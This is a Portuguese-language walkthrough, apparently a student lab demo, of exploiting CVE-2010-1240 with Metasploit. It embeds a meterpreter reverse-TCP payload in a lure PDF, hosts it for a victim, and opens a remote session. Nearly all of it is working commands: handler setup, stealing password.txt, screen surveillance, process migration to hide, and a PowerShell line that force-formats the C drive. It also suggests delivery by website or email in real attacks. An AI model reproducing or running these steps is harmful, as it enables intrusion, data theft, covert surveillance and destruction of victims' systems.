
Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inocente para o alvo, que na verdade contém um payload embutido. A exploração foi tornado pública como CVE-2010-1240.
trazido a você por
Este vídeo de demonstração mostra como podemos controlar o dispositivo da vítima enviando o arquivo PDF de aparência inocente para o alvo, que na verdade consiste em um payload embutido. A exploração foi tornada pública como CVE-2010-1240.
Assim que o PDF é aberto no Adobe Reader, os usuários que estão sendo enganados por nós para concordar com os pop-ups de segurança nos permitirão obter uma sessão meterpreter conectada aos seus dispositivos via conexão TCP reversa. Até esse momento, todos os seus dados e o que estão fazendo agora estão sob nossa vigilância.

Primeiro, iniciamos o MSFconsole que fornece interface de linha de comando para acessarmos o framework Metasploit.
msfconsole
Em seguida, procuramos por exploits que correspondam à nossa plataforma Windows alvo e ao Adobe PDF Reader, onde será exibida uma lista completa de exploits que podem ser usados para sequestrar a máquina Windows da vítima e explorar as vulnerabilidades do Adobe PDF Reader.
search type:exploit platform:windows adobe pdf
Nesta exploração, selecionamos e usamos o módulo "adobe_pdf_embedded_exe" usando o comando abaixo para atingir o objetivo de sequestrar a vítima.
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Também podemos verificar as informações do exploit usando o comando “info” conforme mostrado abaixo:
info
Em seguida, configuramos o payload para usar conexão TCP reversa. Também usamos o Meterpreter que fornece um shell interativo que facilita o uso de todos os tipos de funções inserindo e executando código para explorar a máquina da vítima.
set payload windows/meterpreter/reverse_tcp
Em seguida, definiremos o host e a porta de escuta. Para LHOST, precisamos colocar o endereço IP da máquina atacante, que neste caso é o endereço IP da nossa máquina Kali (10.0.2.4)*.
*p.s.
Enquanto isso, para LPORT, cabe a nós definir um número de porta que não seja comumente usada.
# to check Kali machine’s IP address
ifconfig
set LHOST *10.0.2.4*
set LPORT 5665
Em seguida, definiremos o arquivo de entrada para a base do PDF com a flag INFILENAME*. Depois, definiremos o nome do arquivo para algo que atraia o interesse da vítima para abrir o arquivo PDF malicioso.
*p.s.
set INFILENAME '/home/kali/Documents/WIC3004Assignment.pdf'
set FILENAME 'Bawang_Ranger_WIC3004Report.pdf'
Podemos visualizar nossas opções novamente antes de executarmos o comando “exploit” para gerar o payload junto com o PDF.
# Then we can show the info or options by
show info | show options
exploit
Assim que terminarmos de gerar o arquivo PDF, moveremos o arquivo para /var/www/html, que é o diretório da nossa máquina Kali para hospedar o servidor de aplicação web para nossa vítima baixar o arquivo PDF posteriormente.
Nota:
sudo mv /home/kali/.msf4/local/Bawang_Ranger_WIC3004Report.pdf /var/www/html
Em seguida, para configurar nosso listener, usaremos "exploit/multi/handler". Novamente, definiremos o payload, LHOST, LPORT alinhados com o que definimos ao gerar o arquivo PDF malicioso. Então executaremos o payload.
Nota:
show info ou show options é um comando opcional para executar.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.0.2.4
set LPORT 5665
[show info | show options]
run
Em outro terminal, verificamos o status do servidor Apache para garantir que ele está em execução para hospedar nosso arquivo PDF em /var/www/html para a vítima baixar o arquivo.
service apache2 status
# If it is inactive, start the service
service apache2 start
Na máquina Windows, abra qualquer navegador como o Chrome e digite o IP do nosso Kali (10.0.2.4)* para acessar o servidor de aplicação web da máquina Kali.
*Nota: Observe o endereço IP da sua própria máquina Kali
Em seguida, simule um usuário salvando o arquivo PDF pretendido.
Assim que o arquivo for aberto pela vítima no Adobe Reader 8.1.2 aceitando as mensagens de segurança do prompt, podemos então observar em nossa máquina Kali que temos uma nova sessão conectada via conexão TCP reversa.
Em um cenário real, montaremos um site com o PDF de payload embutido para que a vítima baixe ou anexe o arquivo via e-mail.
Em seguida, podemos acessar remotamente a máquina da vítima e então realizar mais comportamentos maliciosos que desejamos na sessão do meterpreter.
help
pwd
ls
Por exemplo, há um arquivo chamado password.txt, podemos emitir o comando download password.txt
download [folder name | filename with extension]
Claro, podemos escrever script malicioso (implantando backdoor) para nos manter conectados à máquina Windows se formos realmente maus! 💀
# Boot command prompt at background
execute -f cmd.exe -H -i
# Create file on Windows
echo "You have been hacked" > hack.txt
#open the txt file we have just created
hack.txt
# Take screenshot
screenshot
# Watch the remote user in real time
screenshare
No entanto, o atacante pode reduzir a suspeita migrando o processo do meterpreter para um diferente usando o módulo migrate na sessão do meterpreter.
meterpreter> run post/windows/manage/migrate
Aqui, ele irá automaticamente gerar um novo processo na máquina da vítima para onde migrar. A vítima então poderá deletar o arquivo PDF infectado, completamente alheia de que o processo já foi para outro lugar.
O atacante pode ainda criar script malicioso na máquina alvo usando o prompt de comando (cmd) ou PowerShell, capaz de derrubar todo o sistema operacional para que não funcione corretamente.
meterpreter> shell
# Start the Windows PowerShell
powershell
#Powershell command to forcefully format the C drive clean.
New-Partition -DiskNumber 1 -UseMaximumSize -AssignDriveLetter C| Format-Volume -DriveLetter C -FileSystemLabel "New"-FileSystem NTFS -Full -Force -Confirm:$false